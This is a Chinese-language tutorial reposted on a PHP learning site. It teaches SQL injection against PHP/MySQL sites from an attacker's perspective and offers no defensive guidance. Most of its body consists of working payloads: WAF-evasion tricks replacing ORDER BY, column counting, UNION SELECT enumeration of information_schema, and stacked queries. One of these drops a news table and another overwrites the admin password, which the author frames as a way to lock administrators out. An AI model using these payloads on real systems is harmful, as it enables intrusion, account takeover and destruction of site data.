登录  /  注册
首页 > 数据库 > mysql教程 > 正文

SQL注入中基础的几个问题及解决方法

php中文网
发布: 2016-06-07 16:17:36
原创
1181人浏览过

以 php 为例 引发 SQL 注入失败最主要的原因是什么主要就是 WAF 和手工保护代码,WAF 用于拦截恶意代码,但是 WAF 很好绕过,规则是死的,人是活的。WAF 部署在服务器端,根据预先定义的规则对 http 请求进行过滤,继而拦截一些通用的必然 xss 和 sql 攻击。

  以 php 为例

  引发 SQL 注入失败最主要的原因是什么主要就是 WAF 和手工保护代码,WAF 用于拦截恶意代码,但是 WAF 很好绕过,规则是死的,人是活的。WAF 部署在服务器端,根据预先定义的规则对 http 请求进行过滤,继而拦截一些通用的必然 xss 和 sql 攻击。

  Order by 语句被拦截?

  这个情况很少发生,,但是有时候 WAF 由于某些原因会拦截,不过,我们可以绕过,方法很简单,用 Group by 就可以了。因为不再 WAF 的规则列表里

  比如下面这样提示 403 forbidden

  ?id=1 order by 100--可以尝试一下 group by

  ?id=1 group by 100-- 成功

  但是,有可能这个还会被拦截。所以我们使用一条流传不那么广泛的一个语句。那就是

  (主查询语句)=(select 1)

  ?id=8 and (select * from admins)=(select 1)

  可能会返回一个错误,类似 Operand should contain 5 column(s).

  这样我们就知道有 5 列了。

  然后 union select 就懂了。。

  ?id=-8 union select 1,2,3,4,5--order by 10000 了仍然没有报错?

  这里讲一下有时候 order by 可以用,但是到 10000 了还是不报错,与上一节不同的是,上

  一节是请求被 WAF 拦截,这里呢,则是因为注入语句有点不同,当我第一次遇到的时候,

  我天真的以为数据库表里真的有 10000 列。答案很简单,order by 1000000 还是不报错,是

  因为我们的注入语句没有运行。

  ?id=9 order by 10000000000-- 不报错

  我们稍微改变一下 url ,在 id 后面加一个单引号,并且在最后加一个加号。

  ?id=9' order by 10000000--+ 报错

  然后开始使用 union 查询就行了,方法一样。

  ?id=-9' union select 1,2,3,4,5,6,7,8--+

  从其他数据库里获取数据

  有时候我们注入成功了,但是读出来的表都是些新闻啊,相册啊,文章啊,之类的,我们要

  找的可是管理,登录表啊。这时候我们就需要看一下是不是还有其他的数据库。

  首先获取所有的数据库名:

  ?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

  然后获得指定数据库的表:

  ?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema= (这里填写数据库 hex 编码)

  然后获取所有列:

  ?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables

  where table_schema=(这里填写数据库 hex 编码) and table_name=(这里填写表名的 hex 编码)

  通过 SQL 注入可以修改数据库里的信息吗?

  SQL 可以查询,,更新,插入信息,所以,查询信息只是其中的一个功能,有时候无法破解

  管理员帐号的 MD5 值。那么为什么不自己加一个呢..insert 插入语句就可以,如果找不到

  后台,邪恶一点,干脆直接 drop 掉整个表,这样,管理员也登陆不上了。网站也坏了。还

  可以通过 update 更新语句来修改管理员密码,

  ?id=1

  假设这里存在注入。

  我们通过 union 获取了一些表名,比如有个 news,那么我们通过下面这个语句删除 news

  表。

  ?id=1; DROP TABLE news

  然后网站所有的新闻内容就没了,如果要该更改管理员密码,那么这样:

  ?id=1; UPDATE 'admin_login' SET 'password' = '你自己的 md5' WHERE login_name='admin'--

智能AI问答
PHP中文网智能助手能迅速回答你的编程问题,提供实时的代码和解决方案,帮助你解决各种难题。不仅如此,它还能提供编程资源和学习指导,帮助你快速提升编程技能。无论你是初学者还是专业人士,AI智能助手都能成为你的可靠助手,助力你在编程领域取得更大的成就。
我要提问
来源:php中文网
收藏 点赞
上一篇:Mysql数据库对文件操作的封装 下一篇:怎样才能保护好 SQL Server 数据库
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
作者最新文章
最新问题
function_exists()无法判定自定义函数 function test()    {        return true;    } ...
凡人来自于2024-04-29 11:01:01
0 19 1243
google 浏览器 手机版显示的怎么实现 老师您好,google 浏览器怎么变成手机版样式的?
艾尼宛尔.亚森来自于2024-04-23 00:22:19
0 6 1161
子窗口操作父窗口,输出没反应 前两句可执行,最后一句没法应
P粉722478067来自于2024-04-19 15:37:47
0 1 1207
父窗口没有输出 document.onclick = function(){ window.opener.document.write('我是子窗口的输出');  &nb...
P粉722478067来自于2024-04-18 23:52:34
0 0 1013
关于CSS思维导图的课件在哪? 课件
凡人来自于2024-04-16 10:10:18
0 0 1120
PX自动转换为REM错误  <style>html {   font-size: calc(100vw / 3.75);      }...
凡人来自于2024-04-16 09:34:16
0 0 5372
PHP数组从URL参数中获取的行为不如预期 我有一个包含类别ID的URL参数,我想将其视为一个数组,如下所示:http://example.com?cat[]=3,9,13在PHP中,我使用它从URL参数获取数组:$catI...
P粉785905797来自于2024-04-06 22:09:02
0 1 1419
通过添加 Width 属性将内容向左移动 我已经为主体提供了边距。主要{左边缘:200px;右边距:200px;文本对齐:居中}由于我想以两行而不是一行显示文本,因此我在样式中添加了width属性。.p{字体大小:12px...
P粉738046172来自于2024-04-06 22:01:35
0 3 550
我应该在 apache 中哪里放置 CustomLog 指令 我正在使用php:7.2-apachedocker。我需要禁用运行状况检查url登录访问日志。基于此链接,他们提到了有关修改Customlog指令的信息。我不是关于需要更改Cust...
P粉573809727来自于2024-04-06 22:03:59
0 1 632
返回值中变量的格式是什么? 我是php的新学习者。我发现有一段代码:if($x<time()){return[false,'error'];}逻辑或变量并不重要,但我不明白[false,'error']...
P粉757556355来自于2024-04-06 21:55:20
0 1 423
相关专题
更多>
热门推荐
热门教程
更多>
相关推荐
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
app下载
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习
PHP中文网抖音号
发现有趣的

Copyright 2014-2024 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号

  • 精品班

  • 技术支持

  • 技术咨询

  • 学习群

  • 会员优惠

  • 返回顶部